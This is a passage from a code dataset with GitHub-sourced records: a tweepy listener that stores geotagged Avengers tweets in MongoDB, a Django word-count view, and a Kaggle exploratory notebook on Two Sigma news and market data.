"usage_type": "attribute"}, {"api_name": "ncc.utils.path_manager.PathManager.mkdir", "line_number": 29, "usage_type": "call"}, {"api_name": "ncc.utils.path_manager.PathManager", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "ncc.utils.file_ops.file_io.open", "line_number": 30, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.file_io", "line_number": 30, "usage_type": "name"}, {"api_name": "ncc.utils.file_ops.file_io.open", "line_number": 32, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.file_io", "line_number": 32, "usage_type": "name"}, {"api_name": "ncc.utils.file_ops.json_io.json_loads", "line_number": 34, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.json_io", "line_number": 34, "usage_type": "name"}, {"api_name": "ncc.utils.file_ops.json_io.json_dumps", "line_number": 37, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.json_io", "line_number": 37, "usage_type": "name"}, {"api_name": "ncc.LOGGER.info", "line_number": 42, "usage_type": "call"}, {"api_name": "ncc.LOGGER", "line_number": 42, "usage_type": "name"}, {"api_name": "multiprocessing.Pool", "line_number": 44, "usage_type": "call"}, {"api_name": "ncc.utils.path_manager.PathManager.ls", "line_number": 50, "usage_type": "call"}, {"api_name": "ncc.utils.path_manager.PathManager", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 60, "usage_type": "call"}, {"api_name": "ncc_dataset.codexglue.code_to_text.LANGUAGES", "line_number": 62, "usage_type": "name"}, {"api_name": "ncc_dataset.codexglue.code_to_text.RAW_DIR", "line_number": 65, "usage_type": "name"}, {"api_name": "ncc_dataset.codexglue.code_to_text.ATTRIBUTES_DIR", "line_number": 68, "usage_type": "name"}, {"api_name": "multiprocessing.cpu_count", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "12934990057", "text": "from 
__future__ import absolute_import, print_function\n\nfrom tweepy.streaming import StreamListener\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nimport tweepy\nimport json\nfrom pymongo import MongoClient\nimport datetime\n\n# Your credentials go here\n\n\nclass AvengersListener(StreamListener):\n\n def on_error(self, status_code):\n if status_code == 420:\n return False\n else:\n print('ERROR:' + repr(status_code))\n return True\n\n def on_data(self, raw_data):\n status = json.loads(raw_data)\n try:\n if 'delete' not in status: # Tweepy también detecta cuando se ha eliminado un tweet\n if status['geo']:\n created_at = status['created_at']\n created_at = datetime.datetime.strptime(created_at, '%a %b %d %H:%M:%S +0000 %Y')\n user_name = status['user']['screen_name']\n text = status['text']\n lat = str(status['coordinates']['coordinates'][1])\n lon = str(status['coordinates']['coordinates'][0])\n rts = status['retweet_count']\n favs = status['favorite_count']\n lang = status['user']['lang']\n print(status['text'])\n client = MongoClient('localhost', 27017)\n db = client['Tweets']\n collection = db['avengers']\n tweet = {'date': created_at, 'user': user_name, 'tweet': text,\n 'latitude': lat, 'longitude': lon, 'language': lang, 'retweets':rts, 'favourites':favs}\n collection.insert_one(tweet)\n except BaseException as e:\n print(\"Error on_data: %s\" % str(e))\n\n\nif __name__ == '__main__':\n\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_secret)\n api = tweepy.API(auth)\n print(api.me().name)\n #\n # places = api.geo_search(query=\"USA\", granularity=\"country\")\n # place_id = places[0].id\n # tweets = api.search(q=\"place:%s\" % place_id)\n\n av_stream = Stream(auth, AvengersListener())\n av_stream.filter(track=['#avengersendgame','#endgame'])\n", "repo_name": "russomaa/Data-Science-Master", "sub_path": "BD_map_tweets/avengerslistener.py", "file_name": "avengerslistener.py", "file_ext": "py", "file_size_in_byte": 2233, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tweepy.streaming.StreamListener", "line_number": 14, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 38, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 50, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 52, "usage_type": "call"}, {"api_name": "tweepy.Stream", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "71961221927", "text": "from collections import OrderedDict\nfrom django.http import HttpResponse\nfrom django.views.generic import View\nfrom django.shortcuts import render\nfrom django.shortcuts import render, render_to_response\nfrom django.template import RequestContext\nfrom .forms import GraphifyForm\nimport json\nimport string\n\ndef error_404(request):\n return render(request, \"404.html\", {})\n\n\ndef error_500(request):\n return render(request, \"500.html\", {})\n\n# Create your views here.\nclass HomeView(View):\n\tform_class = GraphifyForm\n\ttemplate_name = \"home.html\"\n\n\tdef get(self, request, *args, **kwargs):\n\t\tform = self.form_class(None)\n\t\tcontext ={\n\t\t\t'form':form,\n\t\t\t'labels': None,\n\t\t\t'data': None\n\t\t}\n\t\treturn 
render(request, self.template_name, context)\n\n\tdef post(self, request):\n\t\tform = self.form_class(request.POST, request.FILES or None)\n\t\terror = None\n\n\t\tif form.is_valid():\n\t\t\ttext_file = form.cleaned_data['file_input']\n\t\t\tdisplay_num = int(form.cleaned_data['display_num'])\n\t\t\tword_count = {}\n\n\t\t\tif not text_file:\n\t\t\t\tcontext ={\n\t\t\t\t\t'form':form,\n\t\t\t\t\t'labels': None,\n\t\t\t\t\t'data': None\n\t\t\t\t}\n\t\t\t\treturn render(request, self.template_name, context)\n\n\t\t\t# chck if this file is a text file\n\t\t\tif '.txt' in str(text_file)[-4:]:\n\t\t\t\ttry:\n\t\t\t\t\ttext_file_data = form.cleaned_data['file_input'].read().decode('utf-8')\n\t\t\t\t\ttranslator = text_file_data.maketrans('', '', string.punctuation)\n\t\t\t\t\ttext_file_data = text_file_data.translate(translator).lower()\n\n\t\t\t\t\tfor word in text_file_data.split():\n\t\t\t\t\t\tif word in word_count:\n\t\t\t\t\t\t\tword_count[word] += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tword_count[word] = 1\n\n\t\t\t\texcept UnicodeDecodeError as u:\n\t\t\t\t\terror = 'The file you tried to parse has encountered \\\n\t\t\t\t\ta unicode decoding error. Please fix the file and \\\n\t\t\t\t\tresubmit.'\n\t\t\t\texcept:\n\t\t\t\t\terror = 'An unknown error occured.'\n\n\t\t\telse:\n\t\t\t\terror = 'Please enter a text file please'\n\n\t\t\t# make sure the size of the list matches the\n\t\t\t# total number of bar you want to return\n\t\t\t# also put data in the right order\n\t\t\tlabels = []\n\t\t\tdata = []\n\t\t\tcount = len(word_count)\n\t\t\tword_count = OrderedDict(sorted(word_count.items(), key=lambda t: t[1]))\n\t\t\tword_count = list(word_count.items())\n\t\t\tword_count.reverse()\n\n\t\t\tif display_num > count:\n\t\t\t\tdisplay_num = count\n\n\t\t\tfor i in word_count[:display_num]:\n\t\t\t data.append(str(i[0]))\n\t\t\t labels.append(str(i[1]))\n\n\t\tcontext ={\n\t\t\t'form':form,\n\t\t\t'error': error,\n\t\t\t'labels': json.dumps(labels),\n\t\t\t'data': json.dumps(data)\n\t\t}\n\t\treturn render(request, self.template_name, context)\n", "repo_name": "devmasternathan/graphify", "sub_path": "graphify/graph/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2513, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 19, "usage_type": "name"}, {"api_name": "forms.GraphifyForm", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 53, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 78, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 92, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 93, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "10146213215", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# # Complete EDA + features engineering + voting LightGBM\n# Nguyen Dang Minh, PhD\n# \n# * [Loading the data](#load_data)\n# * [Exploring news data](#explore_news)\n# * [Exploring market data](#explore_market)\n# * [Preprocessing](#preprocessing)\n# * 
[Features engineering](#feature_engineering)\n# * [Building model](#building_model)\n# * [Making submission](#making_submission)\n\n# In this notebook, I will present my statistical analysis on both the news and market data of the Kaggle problem: [Using News to Predict Stock Movements](http://https://www.kaggle.com/c/two-sigma-financial-news)\n\n# In[ ]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport datetime\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport re\nfrom scipy import stats\n\nmatplotlib.rcParams['figure.figsize'] = (10, 5)\nmatplotlib.rcParams['font.size'] = 12\n\nimport random\nrandom.seed(1)\nimport time\n\nimport xgboost as xgb\nimport lightgbm as lgb\nfrom sklearn.model_selection import train_test_split, GridSearchCV, RandomizedSearchCV\nfrom sklearn.metrics import get_scorer\nfrom sklearn.metrics import f1_score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.ensemble import VotingClassifier\nimport lightgbm as lgb\nfrom sklearn.externals.joblib import Parallel, delayed\nfrom sklearn.base import clone\n\nimport pickle\n\n# In[ ]:\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# In[ ]:\n\n\nmatplotlib.rcParams['figure.figsize'] = (10, 5)\nmatplotlib.rcParams['font.size'] = 12\n\n# In[ ]:\n\n\nfrom kaggle.competitions import twosigmanews\n# You can only call make_env() once, so don't lose it!\nenv = twosigmanews.make_env()\nprint('Done!')\n\n# \n# \n# ## Load the data\n\n# In[ ]:\n\n\n(market_train_orig, news_train_orig) = env.get_training_data()\n\n# In[ ]:\n\n\nmarket_train_df = market_train_orig.copy()\nnews_train_df = news_train_orig.copy()\nprint('Market train shape: ',market_train_df.shape)\nprint('News train shape: ', news_train_df.shape)\n\n# In[ ]:\n\n\nmarket_train_df.describe()\n\n# In[ ]:\n\n\nnews_train_df.describe()\n\n# \n# \n# ## Explore news data\n\n# ### Evolutions over time\n\n# In[ ]:\n\n\n# Sort values by time then extract date\nnews_train_df = news_train_df.sort_values(by='time')\nnews_train_df['date'] = news_train_df['time'].dt.date\n\n# In[ ]:\n\n\n# Function to plot time series data\ndef plot_vs_time(data_frame, column, calculation='mean', span=10):\n if calculation == 'mean':\n group_temp = data_frame.groupby('date')[column].mean().reset_index()\n if calculation == 'count':\n group_temp = data_frame.groupby('date')[column].count().reset_index()\n if calculation == 'nunique':\n group_temp = data_frame.groupby('date')[column].nunique().reset_index()\n group_temp = group_temp.ewm(span=span).mean()\n fig = plt.figure(figsize=(10,3))\n plt.plot(group_temp['date'], group_temp[column])\n plt.xlabel('Time')\n plt.ylabel(column)\n plt.title('%s versus time' %column)\n\n# In[ ]:\n\n\nplot_vs_time(news_train_df, 'sourceId', calculation='count', span=10)\nplt.title('News count vs time')\nplt.ylabel('Count')\n\n# There is a maximum peak every quarter (time for quaterly financial report) and a minimum peak at the end of the year (time for Christmast holliday.)\n\n# In[ ]:\n\n\n# Plot time evolution of several parameters\n\ncolumns = ['urgency', 'takeSequence', 'companyCount','marketCommentary','sentenceCount',\\\n 'firstMentionSentence','relevance','sentimentClass','sentimentWordCount','noveltyCount24H', 'volumeCounts24H']\n\nfor column in columns:\n plot_vs_time(news_train_df, column)\n\n# ### Time delay\n\n# In[ ]:\n\n\ntime_delay = (pd.to_datetime(news_train_df['time']) - 
pd.to_datetime(news_train_df['firstCreated']))\ntime_delay_log10 = np.log10(time_delay.dt.total_seconds()/60+1)\n\n# In[ ]:\n\n\nplt.hist(time_delay_log10, bins=np.arange(0,2.5,0.25), rwidth=0.7)\nplt.xlabel('$Log_{10}$(Time delay in minutes +1)')\nplt.ylabel('Counts')\nplt.title('Delay time distribution')\n\n# In[ ]:\n\n\ntime_delay_min = time_delay.dt.total_seconds()/60\ntime_delay_df = time_delay_min.to_frame().join(news_train_df['date'].to_frame())\ntime_delay_df.columns = ['delay','date']\nplot_vs_time(time_delay_df, 'delay')\nplt.ylabel('Delay (minutes)')\n\n# ### Urgency\n\n# In[ ]:\n\n\nurgency_count = news_train_df.groupby('urgency')['sourceId'].count()\nurgency_count = urgency_count/urgency_count.sum()\nprint('Urgency ratio')\nurgency_count.sort_values(ascending=True)\ndel urgency_count\n\n# ### Take sequence\n\n# In[ ]:\n\n\ntake_sequence = news_train_df.groupby('takeSequence')['sourceId'].count()\n\n# In[ ]:\n\n\ntake_sequence = take_sequence.sort_values(ascending= False)\ntake_sequence[:10].plot.barh()\nplt.xlabel('Count')\nplt.ylabel('Take sequence')\nplt.title('Top 10 take sequence')\nplt.gca().invert_yaxis()\ndel take_sequence\n\n# ### Providers\n\n# In[ ]:\n\n\nprovider_count = news_train_df.groupby('provider')['sourceId'].count()\n\n# In[ ]:\n\n\nprovider_sort = provider_count.sort_values(ascending= False)\nprovider_sort[:10].plot.barh()\nplt.xlabel('Count')\nplt.ylabel('Provider')\nplt.title('Top 10 news provider')\nplt.gca().invert_yaxis()\ndel provider_count\n\n# ### Subjects\n\n# In[ ]:\n\n\n# Extract data from a single cell\ndef contents_to_list(contents):\n text = contents[1:-1]\n text = re.sub(r\",\",' ',text)\n text = re.sub(r\"'\",\"\", text)\n text_list = text.split(' ')\n return text_list\n\n# Put data from columns into dict\ndef get_content_dict(content_column):\n content_dict = {}\n for i in range(len(content_column)):\n this_cell = content_column[i]\n content_list = contents_to_list(this_cell) \n for content in content_list:\n if content in content_dict.keys():\n content_dict[content] += 1\n else:\n content_dict[content] = 1\n return content_dict\n\n\n# In[ ]:\n\n\nsubjects = news_train_df.sample(n=10000, random_state=1)['subjects']\nsubjects_dict = get_content_dict(subjects)\n\n# In[ ]:\n\n\nsubjects_df = pd.Series(subjects_dict).sort_values(ascending=False)\nsubjects_df[:15].plot.barh()\nplt.ylabel('Subjects')\nplt.xlabel('Counts')\nplt.title('Top subjects for 10k data')\nplt.gca().invert_yaxis()\ndel subjects_df\n\n# ### Audiences\n\n# In[ ]:\n\n\naudiences = news_train_df.sample(n=10000, random_state=1)['audiences']\naudiences_dict = get_content_dict(audiences)\n\n# In[ ]:\n\n\naudiences_df = pd.Series(audiences_dict).sort_values(ascending=False)\naudiences_df[:15].plot.barh()\nplt.ylabel('Audiences')\nplt.xlabel('Counts')\nplt.title('Top audiences for 10k data')\nplt.gca().invert_yaxis()\n\n# ### Company Count\n\n# In[ ]:\n\n\nnews_train_df['companyCount'].hist(bins=np.arange(0,30,1))\nplt.xlabel('Company count')\nplt.title('Company count distribution')\n\n# ### Head line tag\n\n# In[ ]:\n\n\nhead_line = news_train_df.groupby('headlineTag')['sourceId'].count()\n\n# In[ ]:\n\n\nhead_line_sort = head_line.sort_values(ascending= False)\nhead_line_sort[:10].plot.barh()\nplt.xlabel('Count')\nplt.ylabel('Head line')\nplt.title('Top 10 head lines')\nplt.gca().invert_yaxis()\ndel head_line\n\n# Most headlines are blank. 
This properties may not be important.\n\n# ### First sentence - Urgency - relevance - sentiment Word Count\n\n# **First sentence and urgency**\n\n# In[ ]:\n\n\nnews_train_df['firstMentionSentence'].hist(bins=np.arange(0,20,1))\nplt.xlabel('First mention sentence')\nplt.ylabel('Count')\nplt.title('First mention sentence distribution')\n\n# In[ ]:\n\n\nsentence_urgency = news_train_df.groupby('firstMentionSentence')['urgency'].mean()\nsentence_urgency.head(5)\ndel sentence_urgency\n\n# **First sentence and relevance**\n\n# In[ ]:\n\n\nnews_train_df['relevance'].hist(bins=np.arange(0,1.01,0.05))\nplt.xlabel('Relevance')\nplt.ylabel('Count')\nplt.title('Relevance distribution')\n\n# In[ ]:\n\n\nsentence_relevance = news_train_df.groupby('firstMentionSentence')['relevance'].mean()\nsentence_relevance[:15].plot.barh()\nplt.xlabel('Relevance')\nplt.title('Relevance by sentence')\nplt.gca().invert_yaxis()\ndel sentence_relevance\n\n# **Sentiment word count and relevance**\n\n# In[ ]:\n\n\nsentimentWordCount = news_train_df.groupby('sentimentWordCount')['sourceId'].count().reset_index()\nplt.plot(sentimentWordCount['sentimentWordCount'], sentimentWordCount['sourceId'])\nplt.xlim(0,300)\nplt.xlabel('Sentiment words count')\nplt.ylabel('Count')\nplt.title('Sentiment words count distribution')\ndel sentimentWordCount\n\n# In[ ]:\n\n\nsentimentWordRatio = news_train_df.groupby('sentimentWordCount')['relevance'].mean()\nplt.plot(sentimentWordRatio)\nplt.xlim(0,2000)\nplt.ylabel('Relevance')\nplt.xlabel('Sentiment word count')\nplt.title('Sentiment word count and relevance')\ndel sentimentWordRatio\n\n# **Sentiment ratio**\n\n# In[ ]:\n\n\nnews_train_df['sentimentRatio'] = news_train_df['sentimentWordCount']/news_train_df['wordCount']\nnews_train_df['sentimentRatio'].hist(bins=np.linspace(0,1.001,40))\nplt.xlabel('Sentiment ratio')\nplt.ylabel('Count')\nplt.title('Sentiment ratio distribution')\n\n# In[ ]:\n\n\nnews_train_df.sample(n=10000, random_state=1).plot.scatter('sentimentRatio', 'relevance')\nplt.title('Relevance vs sentiment ratio of 10k samples')\n\n# ### Asset name\n\n# In[ ]:\n\n\nasset_name = news_train_df.groupby('assetName')['sourceId'].count()\nprint('Total number of assets: ',news_train_df['assetName'].nunique())\n\n# In[ ]:\n\n\nasset_name = asset_name.sort_values(ascending=False)\nasset_name[:10].plot.barh()\nplt.gca().invert_yaxis()\nplt.xlabel('Count')\nplt.title('Top 10 assets news')\n\n# In[ ]:\n\n\nfor i, j in zip([-1, 0, 1], ['negative', 'neutral', 'positive']):\n df_sentiment = news_train_df.loc[news_train_df['sentimentClass'] == i, 'assetName']\n print(f'Top mentioned companies for {j} sentiment are:')\n print(df_sentiment.value_counts().head(5))\n print('')\n\n# ### Remove outliers and plot correlation\n\n# In[ ]:\n\n\n# Function to remove outliers\ndef remove_outliers(data_frame, column_list, low=0.02, high=0.98):\n temp_frame = data_frame\n for column in column_list:\n this_column = data_frame[column]\n quant_df = this_column.quantile([low,high])\n low_limit = quant_df[low]\n high_limit = quant_df[high]\n temp_frame[column] = data_frame[column].clip(lower=low_limit, upper=high_limit)\n return temp_frame\n\n# In[ ]:\n\n\n# Remove outlier\ncolumns_outlier = ['takeSequence', 'bodySize', 'sentenceCount', 'wordCount', 'sentimentWordCount', 'firstMentionSentence','noveltyCount12H',\\\n 'noveltyCount24H', 'noveltyCount3D', 'noveltyCount5D', 'noveltyCount7D', 'volumeCounts12H', 'volumeCounts24H',\\\n 'volumeCounts3D','volumeCounts5D','volumeCounts7D']\nnews_rmv_outlier = 
remove_outliers(news_train_df, columns_outlier)\n\n# In[ ]:\n\n\n# Plot correlation\ncolumns_corr = ['urgency', 'takeSequence', 'companyCount','marketCommentary','sentenceCount',\\\n 'firstMentionSentence','relevance','sentimentClass','sentimentWordCount','noveltyCount24H',\\\n 'noveltyCount3D', 'noveltyCount5D', 'noveltyCount7D','volumeCounts24H','volumeCounts3D','volumeCounts5D','volumeCounts7D']\ncolormap = plt.cm.RdBu\nplt.figure(figsize=(18,15))\nsns.heatmap(news_rmv_outlier[columns_corr].astype(float).corr(), linewidths=0.1, vmax=1.0, vmin=-1., square=True, cmap=colormap, linecolor='white', annot=True)\nplt.title('Pair-wise correlation')\n\n# \n# \n# ## Explore market data\n\n# In[ ]:\n\n\nprint('Check null data:')\nmarket_train_df.isna().sum()\n\n# **Some preprocessing:**\n# * Sort data in chronological order\n# * All NAN data comes from the market adjusted column. We fill them up with the raw value data\n\n# In[ ]:\n\n\n# Sort data\nmarket_train_df = market_train_df.sort_values('time')\nmarket_train_df['date'] = market_train_df['time'].dt.date\n\n# Fill nan\nmarket_train_fill = market_train_df\ncolumn_market = ['returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10', 'returnsOpenPrevMktres10']\ncolumn_raw = ['returnsClosePrevRaw1', 'returnsOpenPrevRaw1','returnsClosePrevRaw10', 'returnsOpenPrevRaw10']\nfor i in range(len(column_raw)):\n market_train_fill[column_market[i]] = market_train_fill[column_market[i]].fillna(market_train_fill[column_raw[i]])\n\n# ### Plot data versus time\n\n# In[ ]:\n\n\nplot_vs_time(market_train_fill, 'assetCode', 'count')\nplt.title('Number of asset codes versus time')\n\n# In[ ]:\n\n\n# Inspired by https://www.kaggle.com/artgor/eda-feature-engineering-and-everything\nfor i in [0.05, 0.1, 0.25, 0.5, 0.75, 0.9, 0.95]:\n price_df = market_train_fill.groupby('date')['close'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['close'], label='%.2f quantile' %i)\nplt.legend(loc='best')\nplt.xlabel('Time')\nplt.ylabel('Price')\nplt.title('Market close price by quantile')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsClosePrevRaw1'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsClosePrevRaw1'], label='%.2f quantile' %i)\nplt.legend(loc='best')\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsClosePrevRaw1 by quantile')\n\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsOpenPrevRaw10'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsOpenPrevRaw10'], label='%.2f quantile' %i)\nplt.legend(loc=1)\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsOpenPrevRaw10 by quantiles')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsOpenPrevMktres10'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsOpenPrevMktres10'], label='%.2f quantile' %i)\nplt.legend(loc=1)\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsOpenPrevMktres10 by quantiles')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsOpenNextMktres10'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsOpenNextMktres10'], label='%.2f quantile' %i)\nplt.legend(loc=1)\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsOpenNextMktres10 by quantiles')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 
0.95]:\n price_df = market_train_fill.groupby('date')['volume'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['volume'], label='%.2f quantile' %i)\nplt.legend(loc='best')\nplt.xlabel('Time')\nplt.ylabel('Volumes')\nplt.title('Market trade volumes by quantile')\n\n# ### Difference between raw values and market adjusted values\n# \n# Let see if there's any difference between raw return and market adjusted return\n\n# In[ ]:\n\n\ncolumn_mkt_raw_diff = []\nfor i in range(len(column_market)):\n this_raw = column_raw[i]\n this_market = column_market[i]\n new_column_name = 'mkt_raw_diff'+this_raw.replace('returns','').replace('Raw','')\n column_mkt_raw_diff.append(new_column_name)\n market_train_fill[new_column_name] = market_train_fill[this_market] - market_train_fill[this_raw]\n\n# In[ ]:\n\n\nmarket_train_fill[column_mkt_raw_diff].describe()\n\n# The difference between raw return and market adjusted returns are negligible, but there are some extreme values. Those values are noise and needs to be taken care of\n\n# ### Asset codes\n\n# In[ ]:\n\n\nassetCode_df = market_train_df.groupby('assetCode')['volume'].sum().sort_values(ascending=False)\nprint('There are %i unique asset code' %len(assetCode_df))\n\n# In[ ]:\n\n\nunknown_name = market_train_fill[market_train_fill['assetName']=='Unknown']\nunknown_count = unknown_name['assetCode'].value_counts().sort_values(ascending=False)\n\n# In[ ]:\n\n\nprint('There are %i unique asset code with unknown asset name' %len(unknown_count))\n\n# In[ ]:\n\n\nunknown_count[:15].plot.barh()\nplt.ylabel('assetCode')\nplt.xlabel('Counts')\nplt.title('Top 15 asset code with Unknown asset name')\nplt.gca().invert_yaxis()\n\n# In[ ]:\n\n\nassetCode_df[:15].plot.barh()\nplt.ylabel('assetCode')\nplt.xlabel('Trading volume')\nplt.title('Top 15 asset code by volume')\nplt.gca().invert_yaxis()\n\n# ### Asset Name\n\n# In[ ]:\n\n\nassetName_Volume = market_train_df.groupby('assetName')['volume'].sum().sort_values(ascending=False)\nassetName_Volume[:15].plot.barh()\nplt.ylabel('assetName')\nplt.xlabel('Trading volume')\nplt.title('Top 15 asset name by volume')\nplt.gca().invert_yaxis()\ndel assetName_Volume\n\n# The volume ranking by coorperation seems to be the same as the rank of asset codes they own, e.g. the one with most popular codes has the most trading volume\n\n# In[ ]:\n\n\nassetName_code = market_train_df.groupby('assetName')['assetCode'].nunique().reset_index().sort_values(by='assetCode',ascending=False)\n\n# In[ ]:\n\n\nassetCodeCount = assetName_code.groupby('assetCode')['assetName'].count().reset_index()\nassetCodeCount.columns = ['assetCodeNo', 'counts']\nassetCodeCount.head()\ndel assetCodeCount\n\n# **The vast majority of companies has only one asset code**. One '*company*' that has 110 actually is the 'Unknown' category. Magically, some companies don't even have any asset code. 
Currently I have no explanation for this.\n\n# ### Correlations\n\n# In[ ]:\n\n\ncolumns_corr_market = ['volume', 'open', 'close','returnsClosePrevRaw1','returnsOpenPrevRaw1',\\\n 'returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10','returnsOpenPrevRaw10',\\\n 'returnsClosePrevMktres10', 'returnsOpenPrevMktres10', 'returnsOpenNextMktres10']\ncolormap = plt.cm.RdBu\nplt.figure(figsize=(18,15))\nsns.heatmap(market_train_fill[columns_corr_market].astype(float).corr(), linewidths=0.1, vmax=1.0, vmin=-1., square=True, cmap=colormap, linecolor='white', annot=True)\nplt.title('Pair-wise correlation')\n\n# ### Dig deeper to a single asset\n# \n# Let's take a closer look to a single asset. Here I choose the one with largest trading volumen: 'Bank of America Corp'\n\n# In[ ]:\n\n\nassetCode = 'Bank of America Corp'\nthisAssetMark_df = market_train_fill[market_train_fill['assetName']==assetCode].sort_values(by='date',ascending=True) \nthisAssetMark_df['diff_open_close'] = thisAssetMark_df['open'] - thisAssetMark_df['close']\nthisAssetNews_df = news_rmv_outlier[news_rmv_outlier['assetName']==assetCode]\n# Trading volume vs time\nthisAssetMark_df.plot(x='date', y='volume')\nplt.title('Trading volume vs time')\n# Price vs time\nthisAssetMark_df.plot(x='date', y='open')\nplt.title('Open price vs time')\n# Return vs time\nthisAssetMark_df.plot(x='date', y=['returnsOpenPrevRaw1', 'returnsOpenPrevRaw10','returnsOpenNextMktres10'], alpha=0.8)\nplt.title('Return vs time')\n\n# It can be seen that trading volume is strongly associated with price, i.e. trade increase when price hits bottom. Return is also strongly fluctuated at such time\n\n# In[ ]:\n\n\nnews_volume = thisAssetNews_df.groupby('date')['sourceId'].count().reset_index()\nnews_volume = news_volume.ewm(span=10).mean()\nnews_volume.plot(x='date',y='sourceId')\nplt.title('News volume vs time')\n\n# In[ ]:\n\n\nnews_urgency = thisAssetNews_df.groupby('date')['urgency'].mean().reset_index()\nnews_urgency = news_urgency.ewm(span=10).mean()\nnews_urgency.plot(x='date',y='urgency')\nplt.title('News urgency vs time')\n\n# The news increases in volumes and urgency as price drops\n\n# In[ ]:\n\n\nnews_relevance = thisAssetNews_df.groupby('date')['relevance'].mean().reset_index()\nnews_relevance = news_relevance.ewm(span=10).mean()\nnews_relevance.plot(x='date',y='relevance')\nplt.title('Relevance vs time')\n\n# In[ ]:\n\n\nnews_sentiment = thisAssetNews_df.groupby('date')['sentimentClass','sentimentNegative','sentimentNeutral','sentimentPositive'].mean().reset_index()\nnews_sentiment = news_sentiment.ewm(span=10).mean()\nnews_sentiment.plot(x='date',y=['sentimentClass','sentimentNegative','sentimentNeutral','sentimentPositive'], alpha=0.8)\nplt.title('Sentiment vs time')\n\n# Sentiments are mostly negative. Sentiment drops as price drops, which is expected.\n# \n# Now let's merge the news and market data and see their correlations\n\n# In[ ]:\n\n\n# Merge news and market data. 
Only keep numeric columns\nthisAssetMark_number = thisAssetMark_df[columns_corr_market+['date']]\nthisAssetMark_number = thisAssetMark_number.groupby('date').mean().reset_index()\nthisAssetNews_number = thisAssetNews_df[columns_corr+['date']]\nthisAssetNews_number = thisAssetNews_number.groupby('date').mean().reset_index()\nthisAssetNews_number['news_volume'] = thisAssetNews_df.groupby('date')['sourceId'].count().reset_index()['sourceId']\nthisAssetMerge = pd.merge(thisAssetMark_number, thisAssetNews_number, how='left', on = 'date')\n\n# In[ ]:\n\n\ncolumns_corr_merge = ['volume','open','close','returnsOpenPrevRaw1','returnsOpenPrevMktres1','returnsOpenPrevRaw10','returnsOpenPrevMktres10',\\\n 'returnsOpenNextMktres10','news_volume','urgency','sentenceCount','relevance','sentimentClass',\\\n 'noveltyCount24H','noveltyCount5D','volumeCounts24H','volumeCounts5D']\ncolormap = plt.cm.RdBu\nplt.figure(figsize=(18,15))\nsns.heatmap(thisAssetMerge[columns_corr_merge].astype(float).corr(), linewidths=0.1, vmax=1.0, vmin=-1., square=True, cmap=colormap, linecolor='white', annot=True)\nplt.title('Pair-wise correlation market and news')\n\n# This concludes the exploratory analysis. I will now proceed on data preprocessing and model building\n\n# In[ 